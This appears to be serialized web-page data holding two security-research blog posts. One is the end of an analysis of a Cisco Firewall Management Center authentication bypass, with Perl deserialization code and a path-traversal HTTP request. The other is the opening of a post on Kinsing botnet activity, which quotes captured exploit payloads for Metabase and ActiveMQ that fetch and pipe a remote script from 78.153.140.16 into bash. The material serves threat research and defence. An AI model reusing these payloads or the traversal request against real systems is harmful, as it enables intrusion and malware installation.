elsif",[1373,9723,4641],{"class":4640},[1373,9725,7350],{"class":1379},[1373,9727,1384],{"class":4640},[1373,9729,4644],{"class":1383},[1373,9731,9564],{"class":4640},[1373,9733,4667],{"class":1397},[1373,9735,9149],{"class":4640},[1373,9737,9588],{"class":2326},[1373,9739,9608],{"class":4640},[1373,9741,9742],{"class":1375,"line":4947},[1373,9743,9613],{"class":4640},[1373,9745,9746,9748,9750,9753,9755,9757,9759,9761,9763],{"class":1375,"line":4952},[1373,9747,4852],{"class":4652},[1373,9749,4656],{"class":1383},[1373,9751,9752],{"class":4640},"fn = SF::Reloc::RelocateFilename(",[1373,9754,4644],{"class":1383},[1373,9756,9564],{"class":4640},[1373,9758,4667],{"class":1397},[1373,9760,9149],{"class":4640},[1373,9762,9588],{"class":2326},[1373,9764,9712],{"class":4640},[1373,9766,9767],{"class":1375,"line":6776},[1373,9768,6520],{"emptyLinePlaceholder":237},[1373,9770,9771,9774,9776,9779,9781],{"class":1375,"line":6781},[1373,9772,9773],{"class":4636}," if",[1373,9775,1384],{"class":4640},[1373,9777,9778],{"class":1397},"-e",[1373,9780,4656],{"class":1383},[1373,9782,9783],{"class":4640},"fn)\n",[1373,9785,9786],{"class":1375,"line":7524},[1373,9787,9788],{"class":4640}," {\n",[1373,9790,9791,9794,9796,9798,9800,9802,9804,9807],{"class":1375,"line":7530},[1373,9792,9793],{"class":4636}," if",[1373,9795,4641],{"class":4640},[1373,9797,4644],{"class":1383},[1373,9799,9564],{"class":4640},[1373,9801,4667],{"class":1397},[1373,9803,9149],{"class":4640},[1373,9805,9806],{"class":2326},"lock",[1373,9808,9809],{"class":4640},"})\n",[1373,9811,9812],{"class":1375,"line":7546},[1373,9813,9814],{"class":4640}," {\n",[1373,9816,9817,9820,9823,9825],{"class":1375,"line":7571},[1373,9818,9819],{"class":1383}," $",[1373,9821,9822],{"class":4640},"deserialized_data = Storable::lock_retrieve(",[1373,9824,4644],{"class":1383},[1373,9826,9827],{"class":4640},"fn);\n",[1373,9829,9830],{"class":1375,"line":7598},[1373,9831,9832],{"class":4640}," }\n",[1373,9834,9835],{"class":1375,"line":7615},[1373,9836,9837],{"class":4636}," else\n",[1373,9839,9840],{"class":1375,"line":7635},[1373,9841,9814],{"class":4640},[1373,9843,9844,9846,9849,9851],{"class":1375,"line":7640},[1373,9845,9819],{"class":1383},[1373,9847,9848],{"class":4640},"deserialized_data = Storable::retrieve(",[1373,9850,4644],{"class":1383},[1373,9852,9827],{"class":4640},[1373,9854,9855],{"class":1375,"line":7648},[1373,9856,9832],{"class":4640},[1373,9858,9859],{"class":1375,"line":7672},[1373,9860,9861],{"class":4640}," }\n",[1373,9863,9864],{"class":1375,"line":7688},[1373,9865,9866],{"class":4636}," else\n",[1373,9868,9869],{"class":1375,"line":7709},[1373,9870,9788],{"class":4640},[1373,9872,9873,9876,9878,9881,9883,9885,9888,9890],{"class":1375,"line":7714},[1373,9874,9875],{"class":1379}," warn",[1373,9877,4883],{"class":1387},[1373,9879,9880],{"class":1391},"Unable to locate file for retrieval: ",[1373,9882,4644],{"class":1383},[1373,9884,9564],{"class":4640},[1373,9886,9887],{"class":1391},"->{filename}",[1373,9889,183],{"class":1387},[1373,9891,4912],{"class":4640},[1373,9893,9894,9897,9899],{"class":1375,"line":7722},[1373,9895,9896],{"class":4636}," return",[1373,9898,7480],{"class":1379},[1373,9900,4912],{"class":4640},[1373,9902,9904],{"class":1375,"line":9903},38,[1373,9905,9861],{"class":4640},[1373,9907,9909],{"class":1375,"line":9908},39,[1373,9910,4795],{"class":4640},[1373,9912,9914,9916,9918,9920,9922,9924,9926,9928],{"class":1375,"line":9913},40,[1373,9915,9721],{"class":4636},[1373,9917,4641],{"class":4640},[1373,9919,4644],{"class":1383},[1373,9921,9564],{"class":4640},[1373,9923,4667],{"class":1397},[1373,9925,9149],{"class":4640},[1373,9927,9156],{"class":2326},[1373,9929,9809],{"class":4640},[1373,9931,9933],{"class":1375,"line":9932},41,[1373,9934,9613],{"class":4640},[1373,9936,9938,9940,9943,9945,9947,9949,9951,9953],{"class":1375,"line":9937},42,[1373,9939,4727],{"class":1383},[1373,9941,9942],{"class":4640},"deserialized_data = Storable::thaw(",[1373,9944,4644],{"class":1383},[1373,9946,9564],{"class":4640},[1373,9948,4667],{"class":1397},[1373,9950,9149],{"class":4640},[1373,9952,9156],{"class":2326},[1373,9954,9712],{"class":4640},[1373,9956,9958],{"class":1375,"line":9957},43,[1373,9959,4795],{"class":4640},[1373,9961,9963],{"class":1375,"line":9962},44,[1373,9964,1855],{"class":4640},[18,9966,9967,9968,9971,9972,9974,9975,9977],{},"By combining the ",[886,9969,9970],{},"licenseValidate"," call with the ",[886,9973,6935],{}," call, we can write arbitrary binary data to ",[886,9976,4484],{},", including Storable serialized Perl. Additionally, the license validation logic appears more than happy to accept arbitrary path traversals:",[1354,9979,9981],{"className":6275,"code":9980,"language":6277,"meta":219,"style":219},"POST \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772810888984 HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=csm_processes\nContent-Length: 65\nAccept-Language: en-US,en;q=0.9\nContent-Type: application\u002Fjson\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nReferer: https:\u002F\u002F10.0.0.226\u002Frna_policy\u002Frna_policy_creation.cgi\nConnection: keep-alive\n\n[\"d8bcba74049486588e0e2f11dacfee4f\",\n\"batchResults\",\n\"..\u002Flicense.tmp\",\n\"1\"]\n",[886,9982,9983,9996,10004,10012,10021,10029,10037,10045,10054,10062,10066,10079,10089,10099],{"__ignoreMap":219},[1373,9984,9985,9987,9990,9992,9994],{"class":1375,"line":1376},[1373,9986,6946],{"class":4636},[1373,9988,9989],{"class":4640}," \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772810888984 ",[1373,9991,6290],{"class":5387},[1373,9993,2180],{"class":4640},[1373,9995,6295],{"class":5467},[1373,9997,9998,10000,10002],{"class":1375,"line":220},[1373,9999,6301],{"class":6300},[1373,10001,4606],{"class":5387},[1373,10003,6306],{"class":1391},[1373,10005,10006,10008,10010],{"class":1375,"line":1266},[1373,10007,6565],{"class":6300},[1373,10009,4606],{"class":5387},[1373,10011,6570],{"class":1391},[1373,10013,10014,10016,10018],{"class":1375,"line":1852},[1373,10015,6411],{"class":6300},[1373,10017,4606],{"class":5387},[1373,10019,10020],{"class":1391}," 65\n",[1373,10022,10023,10025,10027],{"class":1375,"line":4692},[1373,10024,6986],{"class":6300},[1373,10026,4606],{"class":5387},[1373,10028,6991],{"class":1391},[1373,10030,10031,10033,10035],{"class":1375,"line":4724},[1373,10032,6391],{"class":6300},[1373,10034,4606],{"class":5387},[1373,10036,7000],{"class":1391},[1373,10038,10039,10041,10043],{"class":1375,"line":4756},[1373,10040,6311],{"class":6300},[1373,10042,4606],{"class":5387},[1373,10044,6316],{"class":1391},[1373,10046,10047,10049,10051],{"class":1375,"line":4768},[1373,10048,9024],{"class":6300},[1373,10050,4606],{"class":5387},[1373,10052,10053],{"class":1391}," https:\u002F\u002F10.0.0.226\u002Frna_policy\u002Frna_policy_creation.cgi\n",[1373,10055,10056,10058,10060],{"class":1375,"line":4792},[1373,10057,6331],{"class":6300},[1373,10059,4606],{"class":5387},[1373,10061,6336],{"class":1391},[1373,10063,10064],{"class":1375,"line":4798},[1373,10065,6520],{"emptyLinePlaceholder":237},[1373,10067,10068,10070,10072,10075,10077],{"class":1375,"line":4806},[1373,10069,7035],{"class":1383},[1373,10071,183],{"class":1387},[1373,10073,10074],{"class":1391},"d8bcba74049486588e0e2f11dacfee4f",[1373,10076,183],{"class":1387},[1373,10078,9062],{"class":1383},[1373,10080,10081,10083,10085,10087],{"class":1375,"line":4817},[1373,10082,183],{"class":1387},[1373,10084,6935],{"class":1391},[1373,10086,183],{"class":1387},[1373,10088,9062],{"class":1383},[1373,10090,10091,10093,10095,10097],{"class":1375,"line":4825},[1373,10092,183],{"class":1387},[1373,10094,8654],{"class":1391},[1373,10096,183],{"class":1387},[1373,10098,9062],{"class":1383},[1373,10100,10101,10103,10105,10107],{"class":1375,"line":4835},[1373,10102,183],{"class":1387},[1373,10104,467],{"class":1391},[1373,10106,183],{"class":1387},[1373,10108,7103],{"class":1383},[18,10110,10111],{},"Without valid Storable data, the application will respond as follows indicating that the sink above has been reached:",[1354,10113,10115],{"className":6275,"code":10114,"language":6277,"meta":219,"style":219},"HTTP\u002F1.1 404 Not Found\nDate: Fri, 06 Mar 2026 15:35:42 GMT\nServer: Mojolicious (Perl)\nStrict-Transport-Security: max-age=31536000; includeSubDomains\nContent-Type: application\u002Fjson\nContent-Length: 192\nCache-Control: no-store\nX-Frame-Options: SAMEORIGIN\nX-UA-Compatible: IE=edge\nX-Permitted-Cross-Domain-Policies: none\nX-XSS-Protection: 1; mode=block\nReferrer-Policy: same-origin\nContent-Security-Policy: base-uri 'self'; frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\n\n{\"error\":{\"text\":\"Error: Magic number checking on storable file failed at \u002Fusr\u002Flib64\u002Fperl5\u002F5.34.1\u002Fx86_64-linux\u002FStorable.pm line 421, at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUtil.pm line 2069.\\n\"}}\n",[886,10116,10117,10131,10140,10148,10156,10164,10173,10181,10189,10197,10205,10213,10221,10229,10237,10245,10253,10257],{"__ignoreMap":219},[1373,10118,10119,10121,10123,10125,10128],{"class":1375,"line":1376},[1373,10120,6290],{"class":5387},[1373,10122,2180],{"class":4640},[1373,10124,6350],{"class":5467},[1373,10126,10127],{"class":5467}," 404",[1373,10129,10130],{"class":1391}," Not Found\n",[1373,10132,10133,10135,10137],{"class":1375,"line":220},[1373,10134,6361],{"class":6300},[1373,10136,4606],{"class":5387},[1373,10138,10139],{"class":1391}," Fri, 06 Mar 2026 15:35:42 GMT\n",[1373,10141,10142,10144,10146],{"class":1375,"line":1266},[1373,10143,6371],{"class":6300},[1373,10145,4606],{"class":5387},[1373,10147,6376],{"class":1391},[1373,10149,10150,10152,10154],{"class":1375,"line":1852},[1373,10151,6381],{"class":6300},[1373,10153,4606],{"class":5387},[1373,10155,6386],{"class":1391},[1373,10157,10158,10160,10162],{"class":1375,"line":4692},[1373,10159,6391],{"class":6300},[1373,10161,4606],{"class":5387},[1373,10163,7000],{"class":1391},[1373,10165,10166,10168,10170],{"class":1375,"line":4724},[1373,10167,6411],{"class":6300},[1373,10169,4606],{"class":5387},[1373,10171,10172],{"class":1391}," 192\n",[1373,10174,10175,10177,10179],{"class":1375,"line":4756},[1373,10176,6421],{"class":6300},[1373,10178,4606],{"class":5387},[1373,10180,6426],{"class":1391},[1373,10182,10183,10185,10187],{"class":1375,"line":4768},[1373,10184,6431],{"class":6300},[1373,10186,4606],{"class":5387},[1373,10188,6436],{"class":1391},[1373,10190,10191,10193,10195],{"class":1375,"line":4792},[1373,10192,6441],{"class":6300},[1373,10194,4606],{"class":5387},[1373,10196,6446],{"class":1391},[1373,10198,10199,10201,10203],{"class":1375,"line":4798},[1373,10200,6451],{"class":6300},[1373,10202,4606],{"class":5387},[1373,10204,6456],{"class":1391},[1373,10206,10207,10209,10211],{"class":1375,"line":4806},[1373,10208,6461],{"class":6300},[1373,10210,4606],{"class":5387},[1373,10212,6466],{"class":1391},[1373,10214,10215,10217,10219],{"class":1375,"line":4817},[1373,10216,6471],{"class":6300},[1373,10218,4606],{"class":5387},[1373,10220,6476],{"class":1391},[1373,10222,10223,10225,10227],{"class":1375,"line":4825},[1373,10224,6481],{"class":6300},[1373,10226,4606],{"class":5387},[1373,10228,6486],{"class":1391},[1373,10230,10231,10233,10235],{"class":1375,"line":4835},[1373,10232,6491],{"class":6300},[1373,10234,4606],{"class":5387},[1373,10236,6496],{"class":1391},[1373,10238,10239,10241,10243],{"class":1375,"line":4843},[1373,10240,6501],{"class":6300},[1373,10242,4606],{"class":5387},[1373,10244,6506],{"class":1391},[1373,10246,10247,10249,10251],{"class":1375,"line":4849},[1373,10248,6331],{"class":6300},[1373,10250,4606],{"class":5387},[1373,10252,6515],{"class":1391},[1373,10254,10255],{"class":1375,"line":4877},[1373,10256,6520],{"emptyLinePlaceholder":237},[1373,10258,10259,10261,10263,10266,10268,10270,10272,10274,10276,10278,10280,10283,10285,10287],{"class":1375,"line":4915},[1373,10260,9149],{"class":1383},[1373,10262,183],{"class":9152},[1373,10264,10265],{"class":9155},"error",[1373,10267,183],{"class":9152},[1373,10269,8304],{"class":1383},[1373,10271,183],{"class":9152},[1373,10273,1359],{"class":9165},[1373,10275,183],{"class":9152},[1373,10277,4606],{"class":1383},[1373,10279,183],{"class":9173},[1373,10281,10282],{"class":9176},"Error: Magic number checking on storable file failed at \u002Fusr\u002Flib64\u002Fperl5\u002F5.34.1\u002Fx86_64-linux\u002FStorable.pm line 421, at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUtil.pm line 2069.",[1373,10284,8943],{"class":2326},[1373,10286,183],{"class":9173},[1373,10288,9238],{"class":1383},[18,10290,10291,10292,10295,10296,4606],{},"Since the Storable module directly enables the ",[886,10293,10294],{},"$Storable::Eval"," setting, there is a high likelihood that the module may be useful for attackers. The Storable module even calls this pattern out directly as ",[47,10297,10300],{"href":10298,"rel":10299},"https:\u002F\u002Fmetacpan.org\u002Fpod\u002FStorable#SECURITY-WARNING",[51],"potentially vulnerable",[18,10302,10303],{},[68,10304],{"alt":10305,"src":10306},"Storable serialization warning.","\u002Fblog\u002Fcisco-fmc-auth-bypass-cve-2026-20079\u002Fstorable-warning.png",[18,10308,10309,10310,10313,10314,10316],{},"After examining Storable test cases and generating Storable data that was written via the license path, the team was eventually able to generate ",[886,10311,10312],{},"CODE"," Perl-serialized data and interact with the ",[886,10315,8677],{}," logic. We were unable to find a sink or gadget that was a candidate for bootstrapping to code execution, however, before we found the installer path to RCE. It’s likely that some Perl wizard out there will be able to find an additional path to execution using this logic.",[18,10318,10319,10320,10325],{},"An exploit, PCAPs, a YARA rule, and network signatures for five different variants ",[47,10321,10324],{"href":10322,"rel":10323},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2026-03-20#cve-2026-20079-cisco-firewall-management-center-authentication-bypass",[51],"are available"," to VulnCheck Initial Access Intelligence customers for CVE-2026-20079.",[61,10327,202],{"id":201},[18,10329,10330,10331,1246,10335,1255,10340,59],{},"VulnCheck’s Initial Access Intelligence team is always on the hunt for new exploits and fresh shells. By delivering machine-consumable, evidence-driven intelligence on new vulnerabilities and how real attackers can use them in the wild, VulnCheck helps organizations prepare earlier, respond decisively, and verify exploitation without relying on inaccurate scores or delayed consensus. For more research like this, see ",[47,10332,10334],{"href":1007,"rel":10333},[51],"Herding Cats: Recent Cisco SD-WAN Manager Vulnerabilities",[47,10336,10339],{"href":10337,"rel":10338},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Ftriofox-exploit-cve-2025-12480",[51],"Tales from the Exploit Mines: Gladinet Triofox CVE-2025-12480 RCE",[47,10341,10344],{"href":10342,"rel":10343},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fsmartermail-connecttohub-rce-cve-2026-24423",[51],"Street Smarts: SmarterMail ConnectToHub Unauthenticated RCE (CVE-2026-24423)",[18,10346,1228,10347,1234,10350,1240,10353,1246,10356,1255,10359,1260],{},[47,10348,1233],{"href":1231,"rel":10349},[51],[47,10351,1239],{"href":1237,"rel":10352},[51],[47,10354,1245],{"href":1243,"rel":10355},[51],[47,10357,1251],{"href":1249,"rel":10358},[51],[47,10360,216],{"href":1258,"rel":10361},[51],[2901,10363,10364],{},"html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .shWJe, html code.shiki .shWJe{--shiki-light:#F76D47;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sHsBP, html code.shiki .sHsBP{--shiki-light:#E53935;--shiki-default:#22863A;--shiki-dark:#85E89D;--shiki-sepia:#F92672}html pre.shiki code .s_lYk, html code.shiki .s_lYk{--shiki-light:#9C3EDA;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sJhdN, html code.shiki .sJhdN{--shiki-light:#E53935;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .sTNss, html code.shiki .sTNss{--shiki-light:#9C3EDA;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html pre.shiki code .sHBcC, html code.shiki .sHBcC{--shiki-light:#E2931D;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sSsL9, html code.shiki .sSsL9{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#FD971F}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .saDeg, html code.shiki .saDeg{--shiki-light:#39ADB5;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sEff5, html code.shiki .sEff5{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .s_MOj, html code.shiki .s_MOj{--shiki-light:#E2931D;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sh1VR, html code.shiki .sh1VR{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sINAO, html code.shiki .sINAO{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sQqfL, html code.shiki .sQqfL{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#F8F8F2}html pre.shiki code .s91G_, html code.shiki .s91G_{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#F8F8F2}",{"title":219,"searchDepth":220,"depth":220,"links":10366},[10367,10370,10371,10372,10373,10374,10375,10376],{"id":4435,"depth":220,"text":4436,"children":10368},[10369],{"id":4509,"depth":1266,"text":4510},{"id":4540,"depth":220,"text":4541},{"id":5033,"depth":220,"text":5034},{"id":6802,"depth":220,"text":6803},{"id":7254,"depth":220,"text":7255},{"id":8619,"depth":220,"text":8620},{"id":9492,"depth":220,"text":9493},{"id":201,"depth":220,"text":202},"2026-03-26T17:00:00-05:00","VulnCheck's Initial Access Intelligence team analysis of CVE-2026-20079, an authentication bypass and remote code execution vulnerability in Cisco Secure Firewall Management Center.",{"slug":10380},"cisco-fmc-auth-bypass-cve-2026-20079","\u002Fblog\u002Fcisco-fmc-auth-bypass-cve-2026-20079",{"title":4407,"description":10378},"blog\u002Fcisco-fmc-auth-bypass-cve-2026-20079",[242,1280],"wvTtNWgRKq8KYAYbQkdRO_i8uIwp6Md9c-MtK1Z-a4w",{"id":10387,"title":10388,"articles":7,"authors":10389,"body":10395,"date":10827,"description":10828,"extension":234,"image":7,"link":7,"meta":10829,"navigation":237,"path":10831,"seo":10832,"series":7,"stem":10833,"subtype":7,"tags":10834,"__hash__":10835},"blog\u002Fblog\u002Freturn-of-the-kinsing.md","The Return of the Kinsing",[10390],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},"Jacob Baines","https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U03S81HQS1J-19e0ae9f7b3c-512","https:\u002F\u002Ftwitter.com\u002FJunior_Baines","@Junior_Baines",{"type":15,"value":10396,"toc":10823},[10397,10400,10408,10417,10448,10454,10460,10465,10471,10481,10494,10500,10526,10535,10542,10559,10570,10576,10579,10585,10599,10609,10613,10764,10766,10802],[263,10398],{":list":10399,"ico":266,"title":20},"[\"Canary Intelligence analysis tied the exploitation of CVE-2023-46604, CVE-2023-38646, and CVE-2025-55182 to the same Kinsing infrastructure.\",\"The activity ran through fresh infrastructure, with the Kinsing attacker node 212.113.98.30 first appearing in our canary network on March 12, 2026.\",\"This is the first time we observed Kinsing associated with CVE-2025-55182 in our canary network.\"]",[18,10401,10402,10403,10407],{},"Our ",[47,10404,283],{"href":10405,"rel":10406},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fintroducing-vulncheck-canary-intelligence",[51]," team was analyzing attacker infrastructure clustering when we had two epiphanies. The first was that the RondoDox botnet needs to calm the fuck down. You’re all over the place, and you need to stop naming your stuff after poop. At least try to act like you have a clue, ok?",[18,10409,10410,10411,10416],{},"The second, and more useful, was that ",[47,10412,10415],{"href":10413,"rel":10414},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fbotnets?botnet=kinsing",[51],"Kinsing"," had surfaced in our canary network.",[18,10418,10419,10420,10424,10425,10430,10431,10436,10437,982,10442,10447],{},"Our clustering grouped three CVEs around a shared set of ",[47,10421,10415],{"href":10422,"rel":10423},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Fdetails\u002Felf.kinsing",[51]," infrastructure. The first two, ",[47,10426,10429],{"href":10427,"rel":10428},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2023-46604",[51],"CVE-2023-46604"," (ActiveMQ) and ",[47,10432,10435],{"href":10433,"rel":10434},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2023-38646",[51],"CVE-2023-38646"," (Metabase), are well-known Kinsing exploit paths documented by ",[47,10438,10441],{"href":10439,"rel":10440},"https:\u002F\u002Fwww.trendmicro.com\u002Fen_us\u002Fresearch\u002F23\u002Fk\u002Fcve-2023-46604-exploited-by-kinsing.html",[51],"Trend Micro",[47,10443,10446],{"href":10444,"rel":10445},"https:\u002F\u002Fblog.sekoia.io\u002Factivemq-cve-2023-46604-exploited-by-kinsing-and-overview-of-this-threat\u002F",[51],"Sekoia",". In our canary network, exploitation from the Kinsing attacker node, 212.113.98.30, began on March 12, 2026, and converged on the same staging host, 78.153.140.16.",[18,10449,10450,10451,4606],{},"Kinsing exploitation of ",[47,10452,10435],{"href":10433,"rel":10453},[51],[1354,10455,10458],{"className":10456,"code":10457,"language":1359},[1357],"POST \u002Fapi\u002Fsetup\u002Fvalidate HTTP\u002F1.1\nHost: VC_REDACTED\nUser-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F78.0.3904.108 Safari\u002F537.36\nConnection: close\nContent-Length: 573\nContent-Type: application\u002Fjson\nAccept-Encoding: gzip\n{\n \"token\": \"9b29cb2d-286a-4374-a0a8-11e10b2aaf7b\",\n \"details\": {\n \"details\": {\n \"subprotocol\": \"h2\",\n \"classname\": \"org.h2.Driver\",\n \"advanced-options\": true,\n \"subname\": \"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(new String[]{\\\"sh\\\", \\\"-c\\\", cmd})\\\\;}$$\\\\;CALL SHELLEXEC('(curl -s 78.153.140.16\u002Fmt.sh||wget -q -O- 78.153.140.16\u002Fmt.sh)|bash');\"\n },\n \"name\": \"x\",\n \"engine\": \"postgres\"\n }\n}\n",[886,10459,10457],{"__ignoreMap":219},[18,10461,10450,10462,4606],{},[47,10463,10429],{"href":10427,"rel":10464},[51],[1354,10466,10469],{"className":10467,"code":10468,"language":1359},[1357],"...o.............Borg.springframework.context.support.ClassPathXmlApplicationContext...http:\u002F\u002F78.153.140.16\u002Facb.xml\n",[886,10470,10468],{"__ignoreMap":219},[18,10472,10473,10474,10477,10478,59],{},"As shown above, the Metabase exploitation path retrieves ",[886,10475,10476],{},"http:\u002F\u002F78.153.140.16\u002Fmt.sh",", while the ActiveMQ path retrieves ",[886,10479,10480],{},"http:\u002F\u002F78.153.140.16\u002Facb.xml",[18,10482,10483,10484,10487,10488,10493],{},"Fetching ",[886,10485,10486],{},"mt.sh",", we found a script exactly as described in ",[47,10489,10492],{"href":10490,"rel":10491},"https:\u002F\u002Fwww.fortinet.com\u002Fblog\u002Fthreat-research\u002Fold-miner-new-tricks",[51],"Fortinet","’s July 2025 Kinsing writeup. The script includes distinctive and exhausting lists of processes to kill and crontab entries to overwrite. More importantly, it downloads the core Kinsing 